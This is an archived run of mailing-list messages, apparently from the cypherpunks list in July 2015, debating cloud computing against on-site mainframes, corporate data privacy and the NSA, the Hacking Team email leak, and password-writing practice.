Large up front costs are bad in a lot of situations, as is committing to a certain scale when there is a lot of uncertainty. The number of businesses and organizations who fit that narrow situation are few and dwindling. Sales will be able to rope in plenty more for a while, but for many it is not a sane choice. Security breaks are mostly about passwords, trojans, spear phishing, zombie machines, etc. For every possible exploit of a cloud system, which at the infrastructure level should have well-funded security, I feel there are many more gaps in the typical local alternative: Sloppy, old Windows systems with a sloppy network, open to everyone file servers, poor access control, terrible custom programming, no significant physical security, etc. The best systems + networks + policies + personnel are more secure, everyone else is just lucky not to be targeted. This covers some of this territory: https://news.ycombinator.com/item?id=2482123 > > [1] http://www.computerworld.com/article/2872096/ibm-s-z13-and-the-case-for-the-mainframe-cloud.html [2] https://www-03.ibm.com/press/us/en/pressrelease/45808.wss sdw -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: text/html Size: 5864 bytes Desc: not available URL: From rysiek at hackerspace.pl Sun Jul 19 11:50:54 2015 From: rysiek at hackerspace.pl (rysiek) Date: Sun, 19 Jul 2015 20:50:54 +0200 Subject: Encryption Rights - A Google+ community In-Reply-To: <874ml0jyfo.fsf@mid.deneb.enyo.de> References: <874ml0jyfo.fsf@mid.deneb.enyo.de> Message-ID: <4359738.CeOcIvrTNq@lapuntu> On Sunday, 19 July 2015 11:20:43 Florian Weimer wrote: > * eden: > > I'm an admin for a lot of groups. Those groups are run on Yahoo, > > > > Google, as well as some that are run on private mailman machines. The > > question keeps coming up... what is the alternative? > > Mailman 3?
It is supposed to offer an interface which appeals more to > casual users not entirely comfortable with email, while at the same > time offering complete email integration. > > I've also seen Discourse instances which look quite useful, but I'm > not a regular user on such platforms to tell how it works out in > practice. Sympa worked pretty well for me also. -- Regards, Michał "rysiek" Woźniak I am changing my GPG key :: http://rys.io/pl/147 GPG Key Transition :: http://rys.io/en/147 -------------- next part -------------- A non-text attachment was scrubbed... Name: signature.asc Type: application/pgp-signature Size: 931 bytes Desc: This is a digitally signed message part. URL: From rysiek at hackerspace.pl Sun Jul 19 11:54:37 2015 From: rysiek at hackerspace.pl (rysiek) Date: Sun, 19 Jul 2015 20:54:37 +0200 Subject: From: root@hackingteam.it To: vince@hackingteam.it [and who?] In-Reply-To: References: Message-ID: <1765623.m5QBTiy03s@lapuntu> On Thursday, 9 July 2015 17:19:11 coderman wrote: > https://wikileaks.org/hackingteam/emails/emailid/144932 There's a bunch more of these, accessible via the very nice search interface: https://wikileaks.org/hackingteam/emails/?q=%22msz.gov.pl%22&mfrom=&mto=&title=&notitle=&date=&nofrom=&noto=&count=50&sort=0#searchresult By the way, does anybody know what this list is about? Customers? Blacklisted people? Targets? -- Regards, Michał "rysiek" Woźniak I am changing my GPG key :: http://rys.io/pl/147 GPG Key Transition :: http://rys.io/en/147 -------------- next part -------------- A non-text attachment was scrubbed... Name: signature.asc Type: application/pgp-signature Size: 931 bytes Desc: This is a digitally signed message part.
URL: From odinn.cyberguerrilla at riseup.net Sun Jul 19 21:01:05 2015 From: odinn.cyberguerrilla at riseup.net (odinn) Date: Sun, 19 Jul 2015 21:01:05 -0700 Subject: an ominous comment In-Reply-To: <55AC62AF.1010904@lig.net> References: <20150714155203.826F52282E2@palinka.tinho.net> <20150720002516.GI27932@nl.grid.coop> <55AC55BA.4050603@lig.net> <20150720021318.GJ27932@nl.grid.coop> <55AC62AF.1010904@lig.net> Message-ID: <55AC7281.8090500@riseup.net> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 an ominous comment On 07/19/2015 07:53 PM, Stephen Williams wrote: > On 7/19/15 7:13 PM, Troy Benjegerdes wrote: >> On Sun, Jul 19, 2015 at 06:58:18PM -0700, Stephen Williams >> wrote: >>> .. If you are large and/or savvy enough, the thing to do is to >>> borrow cloud system methods and run a cloud for yourself. >>> Currently, that's not completely easy or turnkey. At some >>> point, we should get to a clean utility computing model, but it >>> will take a few more generations of evolution. >>> >>> sdw >>> >> IBM would tell you the z13 is the best platform to run a cloud >> on. Claims are you get 8000 or so cloud servers per machine [1]. >> I'm sure fujitsu or some other vendor will sell you something >> equally expensive in the same 'mainframe' class that can >> virtualize like that. >> >> A lot of what I hear about 'cloud' and virtualization are things >> that were first deployed in 1970's-ish on mainframes. >> >> Now, you're absolutely right that a 1TB hard drive that has been >> qualified to work with that machine will cost about 10x what you >> can get at staples. > > It's 10x for the drive, another 10x for the box to put it in, > another 10x for a license for the software to get to it, ... > (Roughly. ;-) ) You can be nickle and dimed up front or over time. > In the latter case, it will continue to get more competitive and > begin to have local systems with the same characteristics. > > How much does an additional 4TB of storage for a z13 cost? 
> >> But the point about mainframes is they are built to have lots of >> *memory bandwidth*, and a 'compute minute' on a Z13 is going to >> process a lot more transactions and write them reliably to that >> overpriced disk than any cloud solution is ever going to do. > > Most cloud systems fall into the embarrassingly parallel category. > Many smaller, cheaper, cooler units completely outclass, in price > and scalability, bigger, faster, higher bandwidth solutions, unless > those are built inexpensively with smaller, cheaper, cooler units. > We're finding out whether medium sized (Intel/AMD desktop / server > class CPUs) or small (ARM mobile chipsets) are going to scale > better, but either way, a many node system has an aggregate memory > bandwidth that dwarfs old-style mega CPU systems. It's not clear, > but it appears that the z13 is just an integrated cloud-style > clustered system with a bunch of nice added features[2]. If so, > which is the only way it could compete on scale and cost, it is a > branded cloud system. Would it really be less expensive to operate > than an Open Compute local cloud? Probably only if you made a lot > of assumptions about overhead, etc. > > The z13 looks cool, and has a lot of interesting features. It will > be interesting to see how it does. > >> You just have to be ready to write a check for a couple of >> million if you want one of these things on-site, and that's why >> the cloud exists, for the folks that either don't have that kind >> of money, or don't understand why they should spend it up-front, >> instead of getting nickel and dimed to death by cloud vendors and >> their hackers. > > If you have the type of business where you know what you need and > how much of it you need, you can competitively provision a local > solution, although there are still plenty of ways to go wrong. And > many do, IMHO. Many businesses have relatively modest needs, don't > know what their growth will look like, etc. 
Large up front costs > are bad in a lot of situations, as is committing to a certain scale > when there is a lot of uncertainty. > > The number of businesses and organizations who fit that narrow > situation are few and dwindling. Sales will be able to rope in > plenty more for a while, but for many it is not a sane choice. > Security breaks are mostly about passwords, trojans, spear > phishing, zombie machines, etc. For every possible exploit of a > cloud system, which at the infrastructure level should have > well-funded security, I feel there are many more gaps in the > typical local alternative: Sloppy, old Windows systems with a > sloppy network, open to everyone file servers, poor access > control, terrible custom programming, no significant physical > security, etc. The best systems + networks + policies + personnel > are more secure, everyone else is just lucky not to be targeted. > > This covers some of this territory: > https://news.ycombinator.com/item?id=2482123 > >> >> [1] >> http://www.computerworld.com/article/2872096/ibm-s-z13-and-the-case-f or-the-mainframe-cloud.html > >> > [2] https://www-03.ibm.com/press/us/en/pressrelease/45808.wss > > sdw > - -- http://abis.io ~ "a protocol concept to enable decentralization and expansion of a giving economy, and a new social good" https://keybase.io/odinn From rysiek at hackerspace.pl Sun Jul 19 12:05:14 2015 From: rysiek at hackerspace.pl (rysiek) Date: Sun, 19 Jul 2015 21:05:14 +0200 Subject: There's this really kewl mesh network that's being
deployed world-wide... In-Reply-To: References: Message-ID: <2289294.1hFPrSu5RT@lapuntu> On Sunday, 5 July 2015 08:38:51 Seth wrote: > I use the term 'smart' in quotes because it is a goddamn propaganda term > and needs to be replaced in the popular culture as soon as possible with > something more apt and mocking, say 'evil-genius'. I will use the term > 'evil-genius' meters from now on. "surveilling meters"? -- Regards, Michał "rysiek" Woźniak I am changing my GPG key :: http://rys.io/pl/147 GPG Key Transition :: http://rys.io/en/147 -------------- next part -------------- A non-text attachment was scrubbed... Name: signature.asc Type: application/pgp-signature Size: 931 bytes Desc: This is a digitally signed message part. URL: From hozer at hozed.org Sun Jul 19 19:13:19 2015 From: hozer at hozed.org (Troy Benjegerdes) Date: Sun, 19 Jul 2015 21:13:19 -0500 Subject: an ominous comment In-Reply-To: <55AC55BA.4050603@lig.net> References: <20150714155203.826F52282E2@palinka.tinho.net> <20150720002516.GI27932@nl.grid.coop> <55AC55BA.4050603@lig.net> Message-ID: <20150720021318.GJ27932@nl.grid.coop> On Sun, Jul 19, 2015 at 06:58:18PM -0700, Stephen Williams wrote: > On 7/19/15 5:25 PM, Troy Benjegerdes wrote: > >On Tue, Jul 14, 2015 at 11:52:03AM -0400, dan at geer.org wrote: > >>Discussing security policy post-OPM debacle in a setting to which > >>I have access (sorry to be oblique), it was said by a CxO "We have > >>to prepare for the day when no software we depend on is run on > >>premises." > >> > >>I did not handle this well (think sputtering as an alternative to > >>white rage). At the same time, I am probably in a bubble in that > >>I suspect that nearly everyone I see with a computer (of any form > >>factor) is already in that situation or, save for Javascript piped > >>in from the cloud to run locally, soon will be -- denizens of this > >>list and a few others excepted. > >> > >>Echoing Lenin echoing Chernyshevsky, "What is to be done?"
or, > >>perhaps, "Is anything to be done?" > >> > >>--dan > >The same thing we did in the old days. > > > >Install an IBM mainframe. > > > >https://www.techwire.net/the-mainframe-lives-on-an-industry-perspective/ > > > >The only place the 'cloud' makes sense is if you are Amazon or Google > >and you want to sell your excess computing capacity to suckers who can't > >afford to buy their own computers. > > > >If you actually do capacity planning and maybe do something like apply > >modern devops to mainframe platforms, you can actually get some economies > >of scale running your mainframe on-site. > > > >It will probably cost less than what that CxO's got paid under-the-table > >in a rigged altcoin pump-and-dump orchestrated by the cloud service > >provider. > > Traditional corporate onsite compute, storage, network, security, > software (Oracle etc.) is almost always extremely expensive. While > a raw hard drive may be inexpensive, if you buy it in an EMC or > mainframe storage array, you are going to pay many multiples more > per GB, compute minute, etc. And, if you bought anything more than > you actually use, you're being very wasteful. Parts of the cloud > revolution are rapid just in time purchase, deployment, change, new > scalable methods, etc., but economically, it is often tremendously > less expensive than a commercial solution plus the support staff to > make it work. In the most efficient traditional local deployment > possible, this may not be true initially, but for the vast majority > of mediocre corporate IT departments, it is very true. > > If you are large and/or savvy enough, the thing to do is to borrow > cloud system methods and run a cloud for yourself. Currently, > that's not completely easy or turnkey. At some point, we should get > to a clean utility computing model, but it will take a few more > generations of evolution. > > sdw > IBM would tell you the z13 is the best platform to run a cloud on. 
Claims are you get 8000 or so cloud servers per machine [1]. I'm sure fujitsu or some other vendor will sell you something equally expensive in the same 'mainframe' class that can virtualize like that. A lot of what I hear about 'cloud' and virtualization are things that were first deployed in 1970's-ish on mainframes. Now, you're absolutely right that a 1TB hard drive that has been qualified to work with that machine will cost about 10x what you can get at staples. But the point about mainframes is they are built to have lots of *memory bandwidth*, and a 'compute minute' on a Z13 is going to process a lot more transactions and write them reliably to that overpriced disk than any cloud solution is ever going to do. You just have to be ready to write a check for a couple of million if you want one of these things on-site, and that's why the cloud exists, for the folks that either don't have that kind of money, or don't understand why they should spend it up-front, instead of getting nickel and dimed to death by cloud vendors and their hackers. [1] http://www.computerworld.com/article/2872096/ibm-s-z13-and-the-case-for-the-mainframe-cloud.html From coderman at gmail.com Sun Jul 19 22:31:42 2015 From: coderman at gmail.com (coderman) Date: Sun, 19 Jul 2015 22:31:42 -0700 Subject: In-Reply-To: <55AC5B26.8050100@pobox.com> References: <55AC5B26.8050100@pobox.com> Message-ID: does this taper off? or just a constant stream of noise... From coderman at gmail.com Sun Jul 19 23:35:32 2015 From: coderman at gmail.com (coderman) Date: Sun, 19 Jul 2015 23:35:32 -0700 Subject: In-Reply-To: <1437373531.2379710.327896465.7A3C60EA@webmail.messagingengine.com> References: <55AC5B26.8050100@pobox.com> <1437373531.2379710.327896465.7A3C60EA@webmail.messagingengine.com> Message-ID: On 7/19/15, Alfie John wrote: > ... > They are mostly astroturfers, pinging every so often. Click report and > move on. i am currently collecting an image corpus... so i can automate the report. 
yeah, that's it. ;) From hozer at hozed.org Sun Jul 19 22:38:09 2015 From: hozer at hozed.org (Troy Benjegerdes) Date: Mon, 20 Jul 2015 00:38:09 -0500 Subject: an ominous comment In-Reply-To: <55AC7281.8090500@riseup.net> References: <20150714155203.826F52282E2@palinka.tinho.net> <20150720002516.GI27932@nl.grid.coop> <55AC55BA.4050603@lig.net> <20150720021318.GJ27932@nl.grid.coop> <55AC62AF.1010904@lig.net> <55AC7281.8090500@riseup.net> Message-ID: <20150720053809.GK27932@nl.grid.coop> So the interesting (and ominous?) question is which costs less: 1 mainframe or: 10,000 distributed multi-terabyte hard drives to store 1 terabyte of blockchain, and all the hashing power needed to secure the blockchain from attackers who can afford mainframes? Second question: Are you pricing in dollars or cryptocoins, cause it seems to me you get divergent answers depending on which one you use. Third question: does the blockchain still work when it shuts down overnight because the distributed power source sets? Or does control revert to the owners of the centralized power plants? On Sun, Jul 19, 2015 at 09:01:05PM -0700, odinn wrote: > -----BEGIN PGP SIGNED MESSAGE----- > Hash: SHA1 > > an ominous comment > > On 07/19/2015 07:53 PM, Stephen Williams wrote: > > On 7/19/15 7:13 PM, Troy Benjegerdes wrote: > >> On Sun, Jul 19, 2015 at 06:58:18PM -0700, Stephen Williams > >> wrote: > >>> .. If you are large and/or savvy enough, the thing to do is to > >>> borrow cloud system methods and run a cloud for yourself. > >>> Currently, that's not completely easy or turnkey. At some > >>> point, we should get to a clean utility computing model, but it > >>> will take a few more generations of evolution. > >>> > >>> sdw > >>> > >> IBM would tell you the z13 is the best platform to run a cloud > >> on. Claims are you get 8000 or so cloud servers per machine [1].
> >> I'm sure fujitsu or some other vendor will sell you something > >> equally expensive in the same 'mainframe' class that can > >> virtualize like that. > >> > >> A lot of what I hear about 'cloud' and virtualization are things > >> that were first deployed in 1970's-ish on mainframes. > >> > >> Now, you're absolutely right that a 1TB hard drive that has been > >> qualified to work with that machine will cost about 10x what you > >> can get at staples. > > > > It's 10x for the drive, another 10x for the box to put it in, > > another 10x for a license for the software to get to it, ... > > (Roughly. ;-) ) You can be nickle and dimed up front or over time. > > In the latter case, it will continue to get more competitive and > > begin to have local systems with the same characteristics. > > > > How much does an additional 4TB of storage for a z13 cost? > > > >> But the point about mainframes is they are built to have lots of > >> *memory bandwidth*, and a 'compute minute' on a Z13 is going to > >> process a lot more transactions and write them reliably to that > >> overpriced disk than any cloud solution is ever going to do. > > > > Most cloud systems fall into the embarrassingly parallel category. > > Many smaller, cheaper, cooler units completely outclass, in price > > and scalability, bigger, faster, higher bandwidth solutions, unless > > those are built inexpensively with smaller, cheaper, cooler units. > > We're finding out whether medium sized (Intel/AMD desktop / server > > class CPUs) or small (ARM mobile chipsets) are going to scale > > better, but either way, a many node system has an aggregate memory > > bandwidth that dwarfs old-style mega CPU systems. It's not clear, > > but it appears that the z13 is just an integrated cloud-style > > clustered system with a bunch of nice added features[2]. If so, > > which is the only way it could compete on scale and cost, it is a > > branded cloud system. 
Would it really be less expensive to operate > > than an Open Compute local cloud? Probably only if you made a lot > > of assumptions about overhead, etc. > > > > The z13 looks cool, and has a lot of interesting features. It will > > be interesting to see how it does. > > > >> You just have to be ready to write a check for a couple of > >> million if you want one of these things on-site, and that's why > >> the cloud exists, for the folks that either don't have that kind > >> of money, or don't understand why they should spend it up-front, > >> instead of getting nickel and dimed to death by cloud vendors and > >> their hackers. > > > > If you have the type of business where you know what you need and > > how much of it you need, you can competitively provision a local > > solution, although there are still plenty of ways to go wrong. And > > many do, IMHO. Many businesses have relatively modest needs, don't > > know what their growth will look like, etc. Large up front costs > > are bad in a lot of situations, as is committing to a certain scale > > when there is a lot of uncertainty. > > > > The number of businesses and organizations who fit that narrow > > situation are few and dwindling. Sales will be able to rope in > > plenty more for a while, but for many it is not a sane choice. > > Security breaks are mostly about passwords, trojans, spear > > phishing, zombie machines, etc. For every possible exploit of a > > cloud system, which at the infrastructure level should have > > well-funded security, I feel there are many more gaps in the > > typical local alternative: Sloppy, old Windows systems with a > > sloppy network, open to everyone file servers, poor access > > control, terrible custom programming, no significant physical > > security, etc. The best systems + networks + policies + personnel > > are more secure, everyone else is just lucky not to be targeted. 
> > > > This covers some of this territory: > > https://news.ycombinator.com/item?id=2482123 > > > >> > >> [1] > >> http://www.computerworld.com/article/2872096/ibm-s-z13-and-the-case-f > or-the-mainframe-cloud.html > > > >> > > [2] https://www-03.ibm.com/press/us/en/pressrelease/45808.wss > > > > sdw > > > > - -- > http://abis.io ~ > "a protocol concept to enable decentralization > and expansion of a giving economy, and a new social good" > https://keybase.io/odinn From cathalgarvey at cathalgarvey.me Mon Jul 20 01:32:51 2015 From: cathalgarvey at cathalgarvey.me (Cathal Garvey) Date: Mon, 20 Jul 2015 09:32:51 +0100 Subject: an ominous comment In-Reply-To: References: <20150714155203.826F52282E2@palinka.tinho.net> <871tg5puda.fsf@mid.deneb.enyo.de> <20150718151551.GA2439@sivokote.iziade.m$> <55AA8B5E.1040202@lig.net> Message-ID: <55ACB233.8020904@cathalgarvey.me> I happen to know someone personally who went to one of the largest social networks out there, and just asked if he could have full backend access to play around and go data mining. They didn't bat an eyelid and gave him access to the kind of data you don't get even from the paid API. This guy happens to be exceptionally convincing, but he wasn't being disingenuous; he literally just promised to fish around and see if he could find and visualise any cool stuff, and they opened up. So, no. Your data isn't remotely safe, not even a little bit. On 19/07/15 01:42, Zenaan Harkness wrote: > On 7/18/15, Stephen D.
Williams wrote: >> I feel perfectly confident that Google is going to >> protect their billions in income and valuation by being very >> careful with avoiding abusing their data or users in any strong sense. > > Wellp, see here now sonny ... a little bit of gennel abuse now, that's > ok now ya here me son? Just a little slap if she says no 'll bring her > right into line, and short or long of that, these here 4 gennel silky > cuffs - tie em reel gennel like, and them users aint ever gonna > notice. Once they's hog tied in a nice soft and golden cage of online > service, they don't know what data been inserted and sold no where. > > ... > > You listenin ta me son?!! > > . > > Stop picken your nose! > -- Scientific Director, IndieBio EU Programme Now running in Cork, Ireland May->July Learn more at indie.bio and follow along! Twitter: @onetruecathal Phone: +353876363185 miniLock: JjmYYngs7akLZUjkvFkuYdsZ3PyPHSZRBKNm6qTYKZfAM peerio.com: cathalgarvey From guninski at guninski.com Mon Jul 20 04:19:16 2015 From: guninski at guninski.com (Georgi Guninski) Date: Mon, 20 Jul 2015 14:19:16 +0300 Subject: From: root@hackingteam.it To: vince@hackingteam.it [and who?] In-Reply-To: <1765623.m5QBTiy03s@lapuntu> References: <1765623.m5QBTiy03s@lapuntu> Message-ID: <20150720111916.GA2493@sivokote.iziade.m$> On Sun, Jul 19, 2015 at 08:54:37PM +0200, rysiek wrote: > On Thursday, 9 July 2015 17:19:11 coderman wrote: > > https://wikileaks.org/hackingteam/emails/emailid/144932 > > There's a bunch more of these, accessible via the very nice search interface: > https://wikileaks.org/hackingteam/emails/?q=%22msz.gov.pl%22&mfrom=&mto=&title=&notitle=&date=&nofrom=&noto=&count=50&sort=0#searchresult > > By the way, does anybody know what this list is about? Customers? Blacklisted > people? Targets? > Are they selling exploit services/solutions or just spyware? From sdw at lig.net Mon Jul 20 14:53:59 2015 From: sdw at lig.net (Stephen D.
Williams) Date: Mon, 20 Jul 2015 14:53:59 -0700 Subject: an ominous comment In-Reply-To: <55ad62b8.8915370a.20276.ffffa5a6@mx.google.com> References: <20150714155203.826F52282E2@palinka.tinho.net> <871tg5puda.fsf@mid.deneb.enyo.de> <20150718151551.GA2439@sivokote.iziade.m$> <55AA8B5E.1040202@lig.net> <55ad62b8.8915370a.20276.ffffa5a6@mx.google.com> Message-ID: <55AD6DF7.50903@lig.net> I hold multitudes. I am in one thread totally cypherpunk, and have been for a very long time. There are innumerable ways to compromise and be compromised for all kinds of good and mostly bad reasons. Perfect protection is tough for in many ways and we should keep striving to get closer to that ideal security stance. On the other hand, life is a balance. I probably shouldn't have tried to make the point here, but it is something a security professional should understand well: The right amount of security should be moderated by the tradeoff of costs vs. overhead vs. maximizing benefit vs. minimizing loss. Security stances change over time and aren't necessarily accurately reflected by paranoid absolutism. An example along these lines that I like to keep in mind: (I really did avoid writing down passwords anywhere for a long time. And I still don't carry them with me. If I did, they wouldn't be plaintext.) https://www.schneier.com/blog/archives/2005/06/write_down_your.html > > > Write Down Your Password > > Microsoft's Jesper Johansson urged > people to write down their passwords. > > This is good advice, and I've been saying it for years. > > Simply, people can no longer remember passwords good enough to reliably defend against dictionary attacks, and are much more > secure if they choose a password too complicated to remember and then write it down. We're all good at securing small pieces of > paper. I recommend that people write their passwords down on a small piece of paper, and keep it with their other valuable small > pieces of paper: in their wallet. 
> It is terrible that some companies have been too eager to share information. They may or may not have believed whatever safeguards were in place, or not cared, etc. I'm sure a high pressure meeting with an FBI crew who are strongly playing the terrorism angle is persuasive, as it should be, up to a point. And companies holding your data can actually look at that data for business purposes, although how they use it is somewhat bounded by privacy laws (however incomplete), not making private things public, unfair business practices, etc. My point was that the existence of large, valuable services that depend on a lot of trust is, or should be to a sane entity, an even stronger incentive to behave than the patchwork of laws. Past oversharing, then embarrassment and public abuse, coupled with product impacts as they lose sensitive customers, has almost certainly caused a cleanup of those attitudes. I'd be interested in the actual policy right now, although I doubt they are going to be too explicit. I suspect that it also varies heavily by corporate culture. Every day, you are somewhat at the mercy of dozens and perhaps thousands of people who could cause you pain, suffering, or death if they were so inclined. There are many in the government, schools, employer personnel departments, medical and insurance companies, etc. The people driving around you, stopped at a light while you cross the street, making your food, they all have access and the ability to inflict misery on you. You have to trust someone to some extent. The question is who you trust, how incentivized they and the people / organization around them protects you, whether wrongs will be limited, corrected, and righted or not. For a long time, as a contractor at the peak of their heyday, I had access to AOL's entire user database, complete with name, address, full credit card info, phone numbers, etc. 
I could have also snooped on their Buddylists, their person-to-person video (Instant Images), and a lot more. There was zero chance that I would abuse any of that. sdw On 7/20/15 2:07 PM, Juan wrote: > > cypherpunk : > > https://www.wikileaks.org/Op-ed-Google-and-the-NSA-Who-s.html > > "Google and the NSA: Who’s holding the ‘shit-bag’ now?" > > > Not-cypherpunk-at-all : > > >> 2015-07-19 2:22 GMT+09:00 Stephen D. Williams : >> >> I feel perfectly confident that Google is going to protect their >> billions in income and valuation by being very careful with >> avoiding abusing their data or users in any strong sense. > > > > From alfiej at fastmail.fm Sun Jul 19 23:25:31 2015 From: alfiej at fastmail.fm (Alfie John) Date: Mon, 20 Jul 2015 16:25:31 +1000 Subject: In-Reply-To: References: <55AC5B26.8050100@pobox.com> Message-ID: <1437373531.2379710.327896465.7A3C60EA@webmail.messagingengine.com> On Mon, Jul 20, 2015, at 03:31 PM, coderman wrote: > joined the twitters recently, Handle? > does this taper off? or just a constant stream of noise... They are mostly astroturfers, pinging every so often. Click report and move on.
Alfie -- Alfie John alfiej at fastmail.fm From admin at pilobilus.net Mon Jul 20 14:47:38 2015 From: admin at pilobilus.net (Steve Kinney) Date: Mon, 20 Jul 2015 17:47:38 -0400 Subject: an ominous comment In-Reply-To: <55ad62b8.8915370a.20276.ffffa5a6@mx.google.com> References: <20150714155203.826F52282E2@palinka.tinho.net> <871tg5puda.fsf@mid.deneb.enyo.de> <20150718151551.GA2439@sivokote.iziade.m$> <55AA8B5E.1040202@lig.net> <55ad62b8.8915370a.20276.ffffa5a6@mx.google.com> Message-ID: <55AD6C7A.5070102@pilobilus.net> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 On 07/20/2015 05:07 PM, Juan wrote: > > > cypherpunk : > > https://www.wikileaks.org/Op-ed-Google-and-the-NSA-Who-s.html > > "Google and the NSA: Who’s holding the ‘shit-bag’ now?" > > > Not-cypherpunk-at-all : > > >> 2015-07-19 2:22 GMT+09:00 Stephen D. Williams : >> >> I feel perfectly confident that Google is going to protect >> their billions in income and valuation by being very careful >> with avoiding abusing their data or users in any strong >> sense. There was a bit of controversy over the relationship between Google and the NSA back when Google was brand new, because the NSA sent engineers over to Google to help them design their server farms. Other companies very properly complained because they were not getting any such free tech support from Uncle Sam. Abusing all your users equally at a scale that makes the abuse a normal environmental condition, produces maximum gains in income and valuation for the enterprise. Also this: https://medium.com/insurge-intelligence/how-the-cia-made-google-e836451a959e And this, https://medium.com/insurge-intelligence/why-google-made-the-nsa-2a80584c9c1 Etc.
From juan.g71 at gmail.com Mon Jul 20 14:07:03 2015 From: juan.g71 at gmail.com (Juan) Date: Mon, 20 Jul 2015 18:07:03 -0300 Subject: an ominous comment In-Reply-To: References: <20150714155203.826F52282E2@palinka.tinho.net> <871tg5puda.fsf@mid.deneb.enyo.de> <20150718151551.GA2439@sivokote.iziade.m$> <55AA8B5E.1040202@lig.net> Message-ID: <55ad62b8.8915370a.20276.ffffa5a6@mx.google.com> cypherpunk : https://www.wikileaks.org/Op-ed-Google-and-the-NSA-Who-s.html "Google and the NSA: Who’s holding the ‘shit-bag’ now?" Not-cypherpunk-at-all : > 2015-07-19 2:22 GMT+09:00 Stephen D. Williams : > > I feel perfectly confident that Google is going to protect their > billions in income and valuation by being very careful with > avoiding abusing their data or users in any strong sense.
From admin at pilobilus.net Mon Jul 20 16:40:52 2015 From: admin at pilobilus.net (Steve Kinney) Date: Mon, 20 Jul 2015 19:40:52 -0400 Subject: an ominous comment In-Reply-To: <55AD6DF7.50903@lig.net> References: <20150714155203.826F52282E2@palinka.tinho.net> <871tg5puda.fsf@mid.deneb.enyo.de> <20150718151551.GA2439@sivokote.iziade.m$> <55AA8B5E.1040202@lig.net> <55ad62b8.8915370a.20276.ffffa5a6@mx.google.com> <55AD6DF7.50903@lig.net> Message-ID: <55AD8704.8070104@pilobilus.net> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 On 07/20/2015 05:53 PM, Stephen D. Williams wrote: > I hold multitudes. I am in one thread totally cypherpunk, and > have been for a very long time. There are innumerable ways to > compromise and be compromised for all kinds of good and mostly > bad reasons. Perfect protection is tough for in many ways and > we should keep striving to get closer to that ideal security > stance. > > On the other hand, life is a balance. I probably shouldn't > have tried to make the point here, but it is something a > security professional should understand well: The right amount > of security should be moderated by the tradeoff of costs vs. > overhead vs. maximizing benefit vs. minimizing loss. Security > stances change over time and aren't necessarily accurately > reflected by paranoid absolutism. Right you are, in "security" context is everything. My take on the Cypherpunk Way is, start with design concepts for maximum security (!= absolute security), then trim the security constraints back just enough to permit useful work to be done on a cost effective basis. This is vs. industry standard security, where one starts with no security considerations at all, then adds just enough security to cover the largest perceived (!= actual) threats from potential adversaries. Compare UNIX style OS architecture to MS style. :) > An example along these lines that I like to keep in mind: (I > really did avoid writing down passwords anywhere for a long > time. 
And I still don't carry them with me. If I did, they > wouldn't be plaintext.) > > https://www.schneier.com/blog/archives/2005/06/write_down_your.html I'm a big fan of password management, as a special case in the category of "A failed data backup may cost more than a successful break-in." Lots of luck getting "normal" users to make and use more than two weak passwords, though. :o/ Steve From sdw at lig.net Mon Jul 20 19:54:05 2015 From: sdw at lig.net (Stephen D. Williams) Date: Mon, 20 Jul 2015 19:54:05 -0700 Subject: an ominous comment In-Reply-To: References: <20150714155203.826F52282E2@palinka.tinho.net> <871tg5puda.fsf@mid.deneb.enyo.de> <20150718151551.GA2439@sivokote.iziade.m$> <55AA8B5E.1040202@lig.net> <55ad62b8.8915370a.20276.ffffa5a6@mx.google.com> <55AD6DF7.50903@lig.net> Message-ID: <55ADB44D.5080402@lig.net> On 7/20/15 4:56 PM, Zenaan Harkness wrote: > On 7/20/15, Stephen D. Williams wrote: >> On the other hand, life is a balance. > True. I'm thinking individuals here.
> >> I probably shouldn't have tried to >> make the point here, but it is something a security >> professional should understand well: The right amount of security >> should be moderated by the tradeoff of costs vs. overhead vs. >> maximizing benefit vs. minimizing loss. > Corporations are bound to their economic imperative to make such trade > offs. This is the heart of their sociopathic nature. This is the part > of corporations/ companies which needs, somehow, to change in order to > get this world on a better track. > > ... >> It is terrible that some companies have been too eager to share information. >> They may or may not have believed whatever safeguards >> were in place, or not cared, etc. I'm sure a high pressure meeting with an >> FBI crew who are strongly playing the terrorism angle is >> persuasive, as it should be, up to a point. > Here's the kind of talk that looks like a hole freshly dug. > > Perhaps if there is an actual existential threat to someone's life or > some building (let's please stop using the T word), then "high > pressure persuasion" would be adequate for a court order anyway. As it > should be - up to the point of a subpoena, summons and/ or order to > perform or act - to handle the actual problem. > > You seem though to be normalising behaviours and approaches and "high > pressure persuasion" tactics by government departments, in a > generalised way. You might not be intending the things you imply/ say, You're making an unqualified assumption about my unqualified qualifier "up to a point"... > but don't be surprised when such positions are mocked or ridiculed. > Don't take such blow back as personal at all though - it's the > "normalisation of bad" and "plainly wrong/ evil" which is being > attacked for the bullshit it is. Feel free. I totally mock and rail about it too. 
I can see several sides to this, and I've been on enough "sides" of these problems, at least in some weak sense, to have some model of decision making by people in those roles. Poor decisions are understandable until there are enough cases, noticed and confronted, to make the right path clear. We're getting a lot of those lately. EFF, SPLC, ACLU, and others, sometimes including commercial entities, are providing an invaluable service of evolving both the law and internal commercial and government policy. Hacking the system cleverly and deliberately is one of the cooler forms of hacking. >> And companies holding your data >> can actually look at that data for business purposes, > Perhaps try something this instead: "And for-profit therefore > sociopathic-by-nature companies do massively collect your metadata AND > your personal information, with or without your consent, and are well > leaked and reported to use and abuse all your data both within and > beyond the law, beyond your expectations, and beyond what many people > consider ethical." A few quibbles: for-profit is sociopathic-by-default perhaps, although even there you are assuming some socioeconomic system. You're also glossing over whether and when consent is an issue. People in public places sometimes believe that others need consent to take their picture; generally not true. Is it rude to take your picture and does rudeness matter? That depends. "Beyond your expectations" is also problematic: How could any possible expectation ever be said to be adhered to? Perhaps "generally accepted fair use as defined by EFF" or something (if there is such a thing) might be reasonable. What is the definition of "many people"? If you use language that can never be satisfied in any reliable way, you can't really complain that an entity isn't satisfying it. > > See what we did there? We made it personal, giving a slight hope to > the uninitiated to realise something they did not realise before. 
